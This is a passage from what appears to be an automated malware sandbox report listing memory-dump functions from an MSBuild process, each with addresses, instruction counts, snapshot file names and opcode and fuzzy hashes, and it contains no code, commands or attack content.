                        • Opcode ID: f0f60c9313bfec8a32cb64798b9c664fd3b50201eddc6855f988dcfc43d2d101
                        • Instruction ID: 511bac871c7eebb1d11ed07ca0852905b33361625cb30c9e7c868b3165b581da
                        • Opcode Fuzzy Hash: f0f60c9313bfec8a32cb64798b9c664fd3b50201eddc6855f988dcfc43d2d101
                        • Instruction Fuzzy Hash: 5A01AD70D182AD9EEF18DB66C8087FEBFF57B46300F048015D012B629ACBB95584CBE1
                        Function 06735B78 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bcd0364b4502e7597bb7b57898ad6b63c0db120acae67b5fdb25b75d5ce04e27
                        • Instruction ID: a959952e9d6a7376e3f0cc0d8c6275730f12dec24f13dcb32a1354756dcaaada
                        • Opcode Fuzzy Hash: bcd0364b4502e7597bb7b57898ad6b63c0db120acae67b5fdb25b75d5ce04e27
                        • Instruction Fuzzy Hash: F3F0F630706750AFE3251639984872ABFD7FB81714F50043DE6878B682CE766845C351
                        Function 00F2DAD4 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680000449.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_f2d000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 205ae4a030587f33f2cd625b9ae2d93eccc0f7c0ec66d9beea222b9fe4b8a248
                        • Instruction ID: df4343824963827d87c3e7d39747d138045d4a686cafb9fd0029d0ec5d23cdf6
                        • Opcode Fuzzy Hash: 205ae4a030587f33f2cd625b9ae2d93eccc0f7c0ec66d9beea222b9fe4b8a248
                        • Instruction Fuzzy Hash: 2BF0CD71408340AAE7208E1AD8C4B62FFA8EB91734F18C55AED080A286C3799840DAB0
                        Function 067635D0 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a6f1087f4f6de0d19cfbacf67412095a14d448bb329e0ba20b4ba6fd698a4f7c
                        • Instruction ID: 47cef7c64b046c4e20df649c389b1e80459b92010fb17c3ee8622d7c4e0447c3
                        • Opcode Fuzzy Hash: a6f1087f4f6de0d19cfbacf67412095a14d448bb329e0ba20b4ba6fd698a4f7c
                        • Instruction Fuzzy Hash: 70F0AF31D042188EC750EFBD98041FEBFB4AB06220B14826AE955EB212E6314682CBC1
                        Function 067620C1 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bd024e52712f0de2b0d329cd627a1e36fce71583a4a1061c75557be2139f6810
                        • Instruction ID: 29b4343fe08cbb99b04d52746cd403e3f40e7d5f5f29f06620e3a5d49f5b9377
                        • Opcode Fuzzy Hash: bd024e52712f0de2b0d329cd627a1e36fce71583a4a1061c75557be2139f6810
                        • Instruction Fuzzy Hash: CBF024316095408FC78ACB69A464835FBA1AB6A22032884E9F618CF327D533DD82CB20
                        Function 0673E6E8 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bce1fdbda7e72ef440190b307c2c3bb8b130e7609ad3694d2f30857a258e275b
                        • Instruction ID: 21124c5ffccbf56f34945c534aaf2b50fb277cc5981e6c7e499d67d879ca5242
                        • Opcode Fuzzy Hash: bce1fdbda7e72ef440190b307c2c3bb8b130e7609ad3694d2f30857a258e275b
                        • Instruction Fuzzy Hash: 2BF03C36A0010AEFCF00DFA8D904CDEBBB6EF49310B1041A5E618EB271D731AA15CB91
                        Function 0673AD3E Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 06a69809804cf966d5e29e9c851ad6c06c3d6f34591e9242ba3aef4a833ddcc2
                        • Instruction ID: f554fbc069e867e0094543e9047867ad93e5fd5e4ef0ebdd876f676285ed5b32
                        • Opcode Fuzzy Hash: 06a69809804cf966d5e29e9c851ad6c06c3d6f34591e9242ba3aef4a833ddcc2
                        • Instruction Fuzzy Hash: ABF02E356043704FC3658B2CD8895357BE1EB8525572985BED99ACF773C631DC42C750
                        Function 0676EF20 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4dbe587ec1c93d91de05425a5e48365bd191905d8260cb2059ff6d53cae3bbf9
                        • Instruction ID: 6f51a75a72e6a7f62b40712c06210adfce19d54c6961f2a1de80ac333ea48f10
                        • Opcode Fuzzy Hash: 4dbe587ec1c93d91de05425a5e48365bd191905d8260cb2059ff6d53cae3bbf9
                        • Instruction Fuzzy Hash: C8F0BB763043128FC794AF78B4584657BA7EFC5B25314C276E11AC73E5ED709C048791
                        Function 0676DD88 Relevance: .0, Instructions: 34COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1ea750ba0de884f5d4266b60ca0319107949d7054fe1071f860940ad375e9d86
                        • Instruction ID: 7a73ea4d214e27b6646ee51cfb085d5bfb087a60d788caf201dc9270805f1163
                        • Opcode Fuzzy Hash: 1ea750ba0de884f5d4266b60ca0319107949d7054fe1071f860940ad375e9d86
                        • Instruction Fuzzy Hash: C4F08931E242189FCBA0EFA998055FDBBF6AF55210F20C126F919D7241E7719E018BE1
                        Function 0673F6C0 Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5938d16a3d8f08d9ca789070d0d81672e413c0eeb27e0d3ed805f46d9b24efea
                        • Instruction ID: b85ee455d06c24c554286073bdb596b9632dd8acc7853deeedeb29cf1ec098bc
                        • Opcode Fuzzy Hash: 5938d16a3d8f08d9ca789070d0d81672e413c0eeb27e0d3ed805f46d9b24efea
                        • Instruction Fuzzy Hash: F0E09237B51220974B115679B4044BE7B9FDBC45B2314003BEA0EC2A50DE75C8028690
                        Function 0673C3BF Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b169acea0e1974152afc7af5fd0674c8f48f83df7ca565dd7803118e73fb9b9d
                        • Instruction ID: 04acec8e407c8a6617944712cbb5c79264ade4b2ac73c80278d0187d51611d53
                        • Opcode Fuzzy Hash: b169acea0e1974152afc7af5fd0674c8f48f83df7ca565dd7803118e73fb9b9d
                        • Instruction Fuzzy Hash: 15F059327082885FCB016E299C548AEBF7AEFD6600F04852AF54447253DF31881187B1
                        Function 06760E10 Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 373600b2dbedef5c9c8a0f4a4681d23bab985eca567723312be4703bfd0ca998
                        • Instruction ID: 54a9588110ed7a179ace2d736444c15c0452d0176df8841903775d79eedf51b1
                        • Opcode Fuzzy Hash: 373600b2dbedef5c9c8a0f4a4681d23bab985eca567723312be4703bfd0ca998
                        • Instruction Fuzzy Hash: 64F0DA753001109F8708DB5AE588C6ABBEAFFCD6253254095F509CB325CB22EC01CB60
                        Function 01019717 Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 05034f0d66f979a57dcac27839b822e55f1be11e67f235b15abd42ca02d8d20b
                        • Instruction ID: f9cae436d3d060dedfd6a0f69240c2407e30efc5786be45ecc00dbfd0216dad6
                        • Opcode Fuzzy Hash: 05034f0d66f979a57dcac27839b822e55f1be11e67f235b15abd42ca02d8d20b
                        • Instruction Fuzzy Hash: EA016D74505B56CFD329DF25E449592BFF1FF893057008A6EE48A83652DB30A84ACF85
                        Function 010186FF Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 972dc973a53549af3fc090088b1107ef88dd95b4e4a687f61abb59b6b2b0fcdc
                        • Instruction ID: afff1d99b95c91a1db8189abcabecb32fa5f0d614d7af9a0b4e339f2ecf2957d
                        • Opcode Fuzzy Hash: 972dc973a53549af3fc090088b1107ef88dd95b4e4a687f61abb59b6b2b0fcdc
                        • Instruction Fuzzy Hash: B5F0EC335081A09FC703A738DD2D2DEBF70DF92210B0500E7E085CB197D6244659C6F6
                        Function 01018F20 Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e4b67899836b0bf8d1d9f37b9fa08aa2e568a78a10a0e8d3e8bd9415e62e0c43
                        • Instruction ID: 56a575849b06cc1ed1c7821078481ebddb9330645e04fc10dac28daea6fc638c
                        • Opcode Fuzzy Hash: e4b67899836b0bf8d1d9f37b9fa08aa2e568a78a10a0e8d3e8bd9415e62e0c43
                        • Instruction Fuzzy Hash: 30F0A7716082285FD745E6A9E4556D97FEAD748225F1480ABE508C3280DF76EA01C790
                        Function 0673C831 Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6f17f59c6038040637288745ab39d83ff359337c1217c45323b8b3b4a6a2dd04
                        • Instruction ID: 16ce6d0595ac74aafa658a9da56957bb68a449ff948fef1503e7b26a8613c6ac
                        • Opcode Fuzzy Hash: 6f17f59c6038040637288745ab39d83ff359337c1217c45323b8b3b4a6a2dd04
                        • Instruction Fuzzy Hash: 8CE09232B04120AFD765CA6EA844FF3B7A9EF95A35718813AE109E7232D122DD05C6A0
                        Function 06768F47 Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 94367eed9b0317f8c009274779d69f44a28e9b02cfc0c72d193bbc51883e2df2
                        • Instruction ID: fc1ec6b866d946aa0f235cd23c573d5b2ae09d9420bfb8a6001c1c16b5bfb6a2
                        • Opcode Fuzzy Hash: 94367eed9b0317f8c009274779d69f44a28e9b02cfc0c72d193bbc51883e2df2
                        • Instruction Fuzzy Hash: 37F06C77E043145F8714CA6A940459EF7FDEE8522474980AAED08E7201DA30BC028B54
                        Function 066FB6D8 Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5238aec68e84a1f918455926c27c2066b210d15aa55870f4bda3050cc0eec176
                        • Instruction ID: 03b86b6096a987f33f0567336dffc37321b9c3e7344f824de463516dff0df29b
                        • Opcode Fuzzy Hash: 5238aec68e84a1f918455926c27c2066b210d15aa55870f4bda3050cc0eec176
                        • Instruction Fuzzy Hash: 09E0D873B093501F57264A2BAC84ABFAF5B6ED56B03068277E698C73D5E914DC0183B2
                        Function 0101D469 Relevance: .0, Instructions: 30COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b0820cedac6dfafb71427f2159e1f5a4204f3822e3540a0fcb30c690f050df3b
                        • Instruction ID: f295503313742caf4bf043ff4834eb1332491808e6c968b1953b97aa8f26f4d3
                        • Opcode Fuzzy Hash: b0820cedac6dfafb71427f2159e1f5a4204f3822e3540a0fcb30c690f050df3b
                        • Instruction Fuzzy Hash: 20F0E53174A3514FCB0797795710168BFB99ED222030804F7D588CB3ABEE2CC8068790
                        Function 0673B622 Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 94fc9c8ecc7dafc8e7c479a6b0818e50cfc7a37df7db5b5b6ad3a37bbd6708de
                        • Instruction ID: 617603d8afcee981d8129eac5fc7baaf827f4da40600477cff4f27eab7013f0a
                        • Opcode Fuzzy Hash: 94fc9c8ecc7dafc8e7c479a6b0818e50cfc7a37df7db5b5b6ad3a37bbd6708de
                        • Instruction Fuzzy Hash: 62F0A032320108EFDB019F44D881CBE7BBAEBD8210F00C10AF64686151EB30A9919BE0
                        Function 0673C3D0 Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 23099914929893de7b5bf3b2be6e241352e8807a1cd1656f5833940ace3db482
                        • Instruction ID: 832d8e17167d9b87e2d156fb13be771b27b6f21a56c34e6d5ad5e5a6917f5ef1
                        • Opcode Fuzzy Hash: 23099914929893de7b5bf3b2be6e241352e8807a1cd1656f5833940ace3db482
                        • Instruction Fuzzy Hash: 05E0923270061DABCB006E69AC849AFBB6EEFD9611F00852AF61597251DF718C1197F1
                        Function 0673C838 Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 652061c45b35c3290f38a91e37e0878062bddcb50f4e1525fd56a9484f7c6242
                        • Instruction ID: c11b8cf8f65939000cb3f1d3cd98ed312b640e34e1ba50336f0c69034f418b9f
                        • Opcode Fuzzy Hash: 652061c45b35c3290f38a91e37e0878062bddcb50f4e1525fd56a9484f7c6242
                        • Instruction Fuzzy Hash: F2E0DF327042246FD365892F9C84FE3B3DCEF89A30B14803AF509EB222D661EC00C6A0
                        Function 06739957 Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ce97cfb4addc1cafdb1bb011ef3417a635f91245b48ad3d56054a6d786481345
                        • Instruction ID: 321f18bb13485fab009859fd486f400d60939ce84003f6c8c5534173eac1f251
                        • Opcode Fuzzy Hash: ce97cfb4addc1cafdb1bb011ef3417a635f91245b48ad3d56054a6d786481345
                        • Instruction Fuzzy Hash: 88E01A1160E3A01FE34B0A345C243D62EA74BC7250F0B41D7E295CB6E7D9984C06C762
                        Function 0676EF94 Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e93c6c2b8347897271bedae493e1ba1f9170fc15250f961dc1b9a90839e9c996
                        • Instruction ID: 9847a8fbcb0308464556535711cdbe9d3dff3d1c42a38f57dc83a8b5a82f33a1
                        • Opcode Fuzzy Hash: e93c6c2b8347897271bedae493e1ba1f9170fc15250f961dc1b9a90839e9c996
                        • Instruction Fuzzy Hash: CAF0EC353083528FC7511BA8B89C1543B77EB85B15354C366E126C73F5ED64C855C791
                        Function 066F15F8 Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 85aae0edf1b13a84caff0b4d1da14ca0a7fb2962c1a87219c4cb7db588721cbe
                        • Instruction ID: cb9573a24dd05878bb80c0ed9cea77051d600446ef6f312e55b2a41eb2e57812
                        • Opcode Fuzzy Hash: 85aae0edf1b13a84caff0b4d1da14ca0a7fb2962c1a87219c4cb7db588721cbe
                        • Instruction Fuzzy Hash: DEE026323092902FA3659619AC00DFB2F9ECAC3560708807BF10ACB280D9208D02C7F0
                        Function 01018790 Relevance: .0, Instructions: 28COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1d9d746eb333ad14025d6a0fb21dbc1b21d6b303e6a84e865083c73eb4ee8274
                        • Instruction ID: b7f523e773122f1f7cb2579871e26b819dee18420d5cf4c204657487254357e1
                        • Opcode Fuzzy Hash: 1d9d746eb333ad14025d6a0fb21dbc1b21d6b303e6a84e865083c73eb4ee8274
                        • Instruction Fuzzy Hash: 90E06D312002146BC3146A6EB889A9E7AEDDBCA365B400428F50AC3241CE75584487A5
                        Function 01019728 Relevance: .0, Instructions: 27COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aefa727ac22405f869f6fc8d6c8f50d1107f5856656d46cffc2dd2b1e4bd48ae
                        • Instruction ID: e56ffd17416b115535354147f80408aa6644a3f4d1f1b8b28cbc4eed0f34030d
                        • Opcode Fuzzy Hash: aefa727ac22405f869f6fc8d6c8f50d1107f5856656d46cffc2dd2b1e4bd48ae
                        • Instruction Fuzzy Hash: A2F06774901B0ACFD328DF26E449512BFF2FB883117008A2EE44A82B14DF70A845CF84
                        Function 0676E078 Relevance: .0, Instructions: 27COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 64d425ca366098eec1899516e1f4ed20c7ff57b55732f49f619d7adb9fa8ca90
                        • Instruction ID: 1fc105c0dc0b534a11cee4518fcbe71ab026f02e1d72addd4a93ff35be1a16bb
                        • Opcode Fuzzy Hash: 64d425ca366098eec1899516e1f4ed20c7ff57b55732f49f619d7adb9fa8ca90
                        • Instruction Fuzzy Hash: C3E0ED31B2C3404FEBA6DA39C0507B2BBA5AF56300F3804AAE481CB2E1CF21CC05C721
                        Function 067620FB Relevance: .0, Instructions: 27COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686405742.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6760000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cf3889a2221da3f2b4de4d07074ba1b650f65dcae6c39a545b9e6de0419e5dbb
                        • Instruction ID: b83a0751382418fe03b363412656fd657c1deaa963f8bad652f4d75813ec2f4e
                        • Opcode Fuzzy Hash: cf3889a2221da3f2b4de4d07074ba1b650f65dcae6c39a545b9e6de0419e5dbb
                        • Instruction Fuzzy Hash: CFE0923450E3C08FC34B9B3959244657F71AF6761031940CAE684CF267CA268C56C7A1
                        Function 066FD277 Relevance: .0, Instructions: 27COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ef68b931496e3821c8b11a16c611735a59d63ef113ab27baf408e4981b8bde3c
                        • Instruction ID: 8e78fb4d9358ebcee1c34d2b341adadcf8faf149208df2b37fa83793f555ff27
                        • Opcode Fuzzy Hash: ef68b931496e3821c8b11a16c611735a59d63ef113ab27baf408e4981b8bde3c
                        • Instruction Fuzzy Hash: 96E092F4C1920A4F8BC4EFE898055AEBFF4BB08240F10416ADB18E2300E731A7028BD1
                        Function 06733F90 Relevance: .0, Instructions: 26COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4b8e79c944f1148464fda7a9b833a86f71aa1330ae5c410bb29da3442dfd82e5
                        • Instruction ID: ccb4b0a46cbab57d12b1bd605fdee5a59be70d09d3c760af4ababc2337576a0a
                        • Opcode Fuzzy Hash: 4b8e79c944f1148464fda7a9b833a86f71aa1330ae5c410bb29da3442dfd82e5
                        • Instruction Fuzzy Hash: FEE06D3024171A8FCB349B3AE8409A6B7F5FF402157440D2DA48787A25CB71F844CB90
                        Function 066F9578 Relevance: .0, Instructions: 26COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0c058cece408ad947b221c868b03f819b09bd7753d990b1af93a8f6302a23670
                        • Instruction ID: 15b70bd75b722382c2dbae6d04379112d3be4bf53dce4ddbcd4b834923dc4398
                        • Opcode Fuzzy Hash: 0c058cece408ad947b221c868b03f819b09bd7753d990b1af93a8f6302a23670
                        • Instruction Fuzzy Hash: 35E092343142409FC7558B74E9549867BE2DF8D31531540AAF505CF365CA35DC42CBA1
                        Function 066F95C1 Relevance: .0, Instructions: 26COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 45df8bd3b2123333b47b4e990c765dde880fcd1b6800feaa0258d8f299df1f7c
                        • Instruction ID: a4586910f15d45ded3e753650973955d58f86632c6fdf45b42253452b7ec1c11
                        • Opcode Fuzzy Hash: 45df8bd3b2123333b47b4e990c765dde880fcd1b6800feaa0258d8f299df1f7c
                        • Instruction Fuzzy Hash: DCF01C30D05248BFC745DFB8E8544ADFFB5AE46304F0082EAE8459B361DA341A49DB95
                        Function 010196C8 Relevance: .0, Instructions: 25COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 939167c207f869880374aa9229bd731b5906722495f4db1046e0d901fe54b2a8
                        • Instruction ID: fcbe0a2b9d1cc33becfdd75ab2949a9377d4f153740b2866629bddf2ee77414f
                        • Opcode Fuzzy Hash: 939167c207f869880374aa9229bd731b5906722495f4db1046e0d901fe54b2a8
                        • Instruction Fuzzy Hash: D4E06D302007659FC721AB2AE40971EBFE6DB81319F04093DE14AC7B54DFB5AC45CB96
                        Function 06735358 Relevance: .0, Instructions: 25COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 88fa8422452bbdf8ac14c8e783276e30b34feb2eafa3730cd749d59d60768ec2
                        • Instruction ID: 53d1bfdbe7b0ccddb8559897a9b8a9e7e3c03d7fc8bd93a9af883978cbab0fff
                        • Opcode Fuzzy Hash: 88fa8422452bbdf8ac14c8e783276e30b34feb2eafa3730cd749d59d60768ec2
